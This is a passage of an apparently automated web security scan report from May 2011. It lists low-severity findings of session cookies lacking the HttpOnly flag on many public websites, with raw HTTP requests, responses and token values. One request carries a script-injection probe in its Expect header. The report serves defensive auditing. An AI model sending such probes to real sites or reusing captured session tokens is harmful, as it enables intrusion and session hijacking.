Set-Cookie: BNES_ASPSESSIONIDASQRBDRA=3o7S5z+ZI9Bg6c1d7LDIgrytASEWNcVVvUpkrT2mTTpLTOrbXf9hGnceJ4HLeNbGYdMc7Flzmry8b7OjbbOTLhlD7u/ZmAOLw7YQk4ynvZqGWV2J97ON7w==; path=/

<html>
   <head>
       <style type="text/css">
           A:hover
           {
               TEXT-DECORATION: underline
           }
           A
           {
               TEXT-DECORATION: none
           }
           .cssTitle
               {
                   .font-family: arial;

...[SNIP]...

13.15. http://www.dedicatedserverdir.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dedicatedserverdir.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCSCSADRD=AELBIENDDPAIECJAMBMADLNB; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dedicatedserverdir.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:16:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.dedicatedserverdir.com/404.aspx
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSCSADRD=AELBIENDDPAIECJAMBMADLNB; path=/
Cache-control: private

13.16. http://www.divorcemag.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.divorcemag.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PSESS=2bb2123a02523f781473776b361cd0ba; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.divorcemag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:21:50 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.7e-p1
Set-Cookie: PSESS=2bb2123a02523f781473776b361cd0ba; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 488

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...

13.17. http://www.dulcolaxusa.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dulcolaxusa.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=R9BvN1Wb7gKJnThX04XwJ0QPSln6H0gClmgyQhnfNwL06cxLjLYv!173549154; path=/
WEBTRENDS_BI=R9BvN1Wb7gKJnThX04XwJ0QPSln6H0gClmgyQhnfNwL06cxLjLYv!173549154!1304417947517; expires=Monday, 07-May-2040 07:06:46 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dulcolaxusa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:07 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-cache="set-cookie"
Accept-Ranges: bytes
Content-Length: 5430
Last-Modified: Fri, 18 Feb 2011 21:19:44 GMT
Set-Cookie: JSESSIONID=R9BvN1Wb7gKJnThX04XwJ0QPSln6H0gClmgyQhnfNwL06cxLjLYv!173549154; path=/
Set-Cookie: WEBTRENDS_BI=R9BvN1Wb7gKJnThX04XwJ0QPSln6H0gClmgyQhnfNwL06cxLjLYv!173549154!1304417947517; expires=Monday, 07-May-2040 07:06:46 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/html; charset=UTF-8

............ .h...&... .... .........(....... ..... ............................................ ;.Eo%t,..g...o..!r&.9b.o... ............................D.LJ.l...a...s....<...Z.
.f...c..x/.?g.J......
...[SNIP]...

13.18. http://www.durangoherald.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.durangoherald.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PBCSSESSIONID=473426015836027; path=/
PBCSPERMUSERID=473426015836027; path=/; expires=Wed, 02 May 2012 04:23:56 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.durangoherald.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Cache-Control: no-cache, no-store, max-age=0, must-revalidate, proxy-revalidate
Content-Length: 60
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 03 May 2011 10:23:56 GMT
Last-Modified: Tue, 03 May 2011 10:23:56 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: PBCSPERMUSERID=473426015836027; path=/; expires=Wed, 02 May 2012 04:23:56 GMT
Set-Cookie: PBCSSESSIONID=473426015836027; path=/
X-Passed-To: S260608AT1VW727, URL Rewrite on site N/A (2011-05-03 06:23:56:011)
X-Handled-By: S260608AT1VW727, Rewrite on site N/A
X-Actual-URL: S260608AT1VW727, (/favicon.ico)
X-Passed-To-DLL: S260608AT1VW727, (2011-05-03 06:23:56:011)
X-Passed-To-BeforeDispatch: S260608AT1VW727, on site DU (2011-05-03 06:23:56:011)
X-Returned-From-BeforeDispatch: S260608AT1VW727, on site DU (2011-05-03 06:23:56:230)
X-Passed-To-PostProcessResponse: S260608AT1VW727, on site DU (2011-05-03 06:23:56:230)
X-Returned-From-PostProcessResponse: S260608AT1VW727, on site DU (2011-05-03 06:23:56:246)
X-Returned-From-DLL: S260608AT1VW727 (2011-05-03 06:23:56:246)
X-Returned-From: S260608AT1VW727(2011-05-03 06:23:56:246)
Date: Tue, 03 May 2011 10:23:56 GMT
X-Cache: MISS from sxsquid01
X-Cache-Lookup: MISS from sxsquid01:80
Via: 1.0 sxsquid01 (squid/3.0.STABLE18)
Connection: close

<html><body><strong>404 Not Found<br></strong></body></html>

13.19. http://www.elmresources.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.elmresources.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=FBDB4AB9467F42498363D289CFFDD597; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elmresources.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.ico
Date: Tue, 03 May 2011 11:04:43 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=FBDB4AB9467F42498363D289CFFDD597; Path=/
Content-Length: 988
Connection: close
Content-Type: text/html;charset=utf-8

<html><head><title>Apache Tomcat/5.5.23 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

13.20. http://www.endfatigue.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.endfatigue.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=6870e394636fd846ce328120d3d14de5; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.endfatigue.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:16:36 GMT
Server: Apache/2.0.61 (Unix) mod_ssl/2.0.61 OpenSSL/0.9.8g mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=6870e394636fd846ce328120d3d14de5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Content-Type: text/html

13.21. http://www.extrabux.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.extrabux.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=2f2ecf4bf2c1a47c48a77b5635c59a1b; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.extrabux.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.22. http://www.freshpreservingstore.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.freshpreservingstore.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDQSBSCSBB=LFEFGOODBIJENKADJJGENIJM; path=/
BIGipServerweb_freshpreservingstore_pool=2751467692.20480.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freshpreservingstore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Tue, 03 May 2011 11:39:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8170
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSBSCSBB=LFEFGOODBIJENKADJJGENIJM; path=/
Cache-control: private
Set-Cookie: BIGipServerweb_freshpreservingstore_pool=2751467692.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<me
...[SNIP]...

13.23. http://www.getfreedental.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.getfreedental.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQAABCTAT=NCCNBJODMOAGBNBOFDMLLDNI; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.getfreedental.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

13.24. http://www.governmentgrants.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.governmentgrants.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=fqr551lj97lu20ac2t7hfp4cm7; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.governmentgrants.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 11:06:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=fqr551lj97lu20ac2t7hfp4cm7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.governmentgrants.com/xmlrpc.php
Last-Modified: Tue, 03 May 2011 11:06:03 GMT
Location: http://www.governmentgrants.com/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

13.25. http://www.grayline.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.grayline.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=15gr1nvtydxud1auxbsaaau2; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.grayline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:35:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=15gr1nvtydxud1auxbsaaau2; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Page Not Found</title>

       <meta http-equi
...[SNIP]...

13.26. http://www.grubhub.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.grubhub.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=2AD3952AA60ABDD325CBDFB91D3CE0CF.worker1; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.grubhub.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=2AD3952AA60ABDD325CBDFB91D3CE0CF.worker1; Path=/
ETag: W/"1150-1304107112000"
Last-Modified: Fri, 29 Apr 2011 19:58:32 GMT
Content-Length: 1150
Cache-Control: max-age=0
Expires: Tue, 03 May 2011 10:27:49 GMT
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@.......................%..@%...%...%...%...%..@........................................%...%...%...%...%...%...%.......................................%..@%.
...[SNIP]...

13.27. http://www.gtop100.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.gtop100.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=ac12eeade9fe5d5ace0f531555e28985; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gtop100.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

13.28. http://www.hitsyndication.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.hitsyndication.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=c6f462559d424f8f31fef30d254da9b1; path=/; domain=www.hitsyndication.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hitsyndication.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=c6f462559d424f8f31fef30d254da9b1; path=/; domain=www.hitsyndication.com
Set-Cookie: aid=3667; expires=Sat, 02-Jul-2011 10:14:15 GMT; path=/; domain=hitsyndication.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Type: image/x-icon
Content-Length: 0
Date: Tue, 03 May 2011 10:14:15 GMT
Server: lighttpd/1.4.26

13.29. http://www.hocking.edu/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.hocking.edu
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=071bb28e577c2a4745a60fb6b4d704f6; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hocking.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 10:32:09 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6.7
Set-Cookie: PHPSESSID=071bb28e577c2a4745a60fb6b4d704f6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.hocking.edu/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html

13.30. http://www.homebasedbusinessmatchingservice.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homebasedbusinessmatchingservice.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=jt47hl5ce3niqi0ujqrbck7fl1; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homebasedbusinessmatchingservice.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:14:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=jt47hl5ce3niqi0ujqrbck7fl1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public, max-age=864000
Vary: Accept-Encoding,User-Agent
Content-Length: 894
Content-Type: text/html; charset=UTF-8

..............h.......(....... .................................$..$..$ .% .& .&!.&!.' .&..$ .%..$..$..$..$..$..$..$..$ .' .'".)".)".)!.( .&..&..%..#..$..$..$..$..%..%..(!.*BDOBEO$"." +!.*..'..%..%..$
...[SNIP]...

13.31. http://www.howtradestocksonline.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.howtradestocksonline.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=691ebead985a40c1d86bfc2e6e885a2b; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.howtradestocksonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:22:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=691ebead985a40c1d86bfc2e6e885a2b; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://howtradestocksonline.com/xmlrpc.php
Last-Modified: Tue, 03 May 2011 10:22:30 GMT
Location: http://howtradestocksonline.com/favicon.ico
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8

13.32. http://www.infowarsshop.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.infowarsshop.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDAQCQCTDT=MMJFGKODGIHHIFFHFDPDNFFJ; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infowarsshop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:15:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Set-Cookie: referer=; expires=Wed, 02-May-2012 04:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDAQCQCTDT=MMJFGKODGIHHIFFHFDPDNFFJ; path=/
Cache-control: private

13.33. http://www.keytrain.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.keytrain.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDAABTBTAB=FLILBIEDFCKPCIMPFFNJNOIC; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.keytrain.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:33 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 6049
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAABTBTAB=FLILBIEDFCKPCIMPFFNJNOIC; path=/
Cache-control: private

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="language" content="en-US">
<META NAME="Keywords" CONTENT="workkeys, work keys, keytrain, NCRC
...[SNIP]...

13.34. http://www.mountainwestbank.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mountainwestbank.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=12180374;expires=Thu, 25-Apr-2041 10:34:26 GMT;path=/
CFTOKEN=fe46a5c00646a7a3-163AC2B5-E41F-1378-121C064B11E81F0B;expires=Thu, 25-Apr-2041 10:34:26 GMT;path=/
CFID=12180374;path=/
CFTOKEN=fe46a5c00646a7a3%2D163AC2B5%2DE41F%2D1378%2D121C064B11E81F0B;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mountainwestbank.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: https://www.mountainwestbank.com/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=12180374;expires=Thu, 25-Apr-2041 10:34:26 GMT;path=/
Set-Cookie: CFTOKEN=fe46a5c00646a7a3-163AC2B5-E41F-1378-121C064B11E81F0B;expires=Thu, 25-Apr-2041 10:34:26 GMT;path=/
Set-Cookie: CFID=12180374;path=/
Set-Cookie: CFTOKEN=fe46a5c00646a7a3%2D163AC2B5%2DE41F%2D1378%2D121C064B11E81F0B;path=/
Date: Tue, 03 May 2011 10:34:25 GMT
Content-Length: 2079

<script type="text/javascript">/* <![CDATA[ */_cf_loadingtexthtml="<img alt=' ' src='/CFIDE/scripts/ajax/resources/cf/images/loading.gif'/>";
_cf_contextpath="";
_cf_ajaxscriptsrc="/CFIDE/scripts/ajax
...[SNIP]...

13.35. http://www.msgcu.org/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.msgcu.org
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=82429aaed8867f744439f82e2f804818; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.msgcu.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:20 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: PHPSESSID=82429aaed8867f744439f82e2f804818; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1406
Connection: close
Content-Type: image/x-icon

..............h.......(....... .................................................!..P...Q...W...[&..]-..^-..z^..z_................. ...%...1...2...6...2...>...@ ..D,..F-..G...M6..N:....................
...[SNIP]...

13.36. http://www.orschelnfarmhome.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.orschelnfarmhome.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=fnWqyN1lYsW4GDCE1_; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.orschelnfarmhome.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 03 May 2011 10:49:07 GMT
Server: Microsoft-IIS/6.0
Cache-Control: private
Location: http://www.orschelnfarmhome.com
Connection: close
Set-Cookie: JSESSIONID=fnWqyN1lYsW4GDCE1_; path=/
Content-Type: text/html

13.37. http://www.outsideinfo.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.outsideinfo.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hotsession=cover%5Fimage%5Ftag=&issue%5Fdate=2011%2D05%2D01&pretty%5Fissue%5Fdate=May+2011&issue%5Fid=37768&survey%5Fset%5Fid=0&preview%5Fmode=False&eresponse=False&card%5Fsurvey%5Fset%5Fid=0&resp%5Fauthenticated=False&session%5Fid=%7BF012A660%2D0BD8%2D4778%2D9ED2%2DCB209010E8F7%7D; path=/
ASPSESSIONIDAQQADCCB=LHCAHIKDNGMNEMLNAGNPBCJI; path=/
hotvisitor=resp%5Fid=0&visitor%5Fid=%7BEDEBB562%2D2E33%2D4864%2D9B88%2D615201844E9B%7D; expires=Wed, 01-Jan-2025 05:00:00 GMT; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.outsideinfo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:45:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 271
Content-Type: text/html
Set-Cookie: hotvisitor=resp%5Fid=0&visitor%5Fid=%7BEDEBB562%2D2E33%2D4864%2D9B88%2D615201844E9B%7D; expires=Wed, 01-Jan-2025 05:00:00 GMT; path=/
Set-Cookie: hotsession=cover%5Fimage%5Ftag=&issue%5Fdate=2011%2D05%2D01&pretty%5Fissue%5Fdate=May+2011&issue%5Fid=37768&survey%5Fset%5Fid=0&preview%5Fmode=False&eresponse=False&card%5Fsurvey%5Fset%5Fid=0&resp%5Fauthenticated=False&session%5Fid=%7BF012A660%2D0BD8%2D4778%2D9ED2%2DCB209010E8F7%7D; path=/
Set-Cookie: ASPSESSIONIDAQQADCCB=LHCAHIKDNGMNEMLNAGNPBCJI; path=/
Cache-control: private

   <html>
   <head>
   <title>404 Not Found</title>
   </head>
   <body bgcolor="White">
   <h1>404 Not Found</h1>
   <p> http://www.outsideinfo.com/favicon.ico    </p>
   <p>
   <a href="http://www.outsideinfo
...[SNIP]...

13.38. http://www.pages02.net/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pages02.net
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

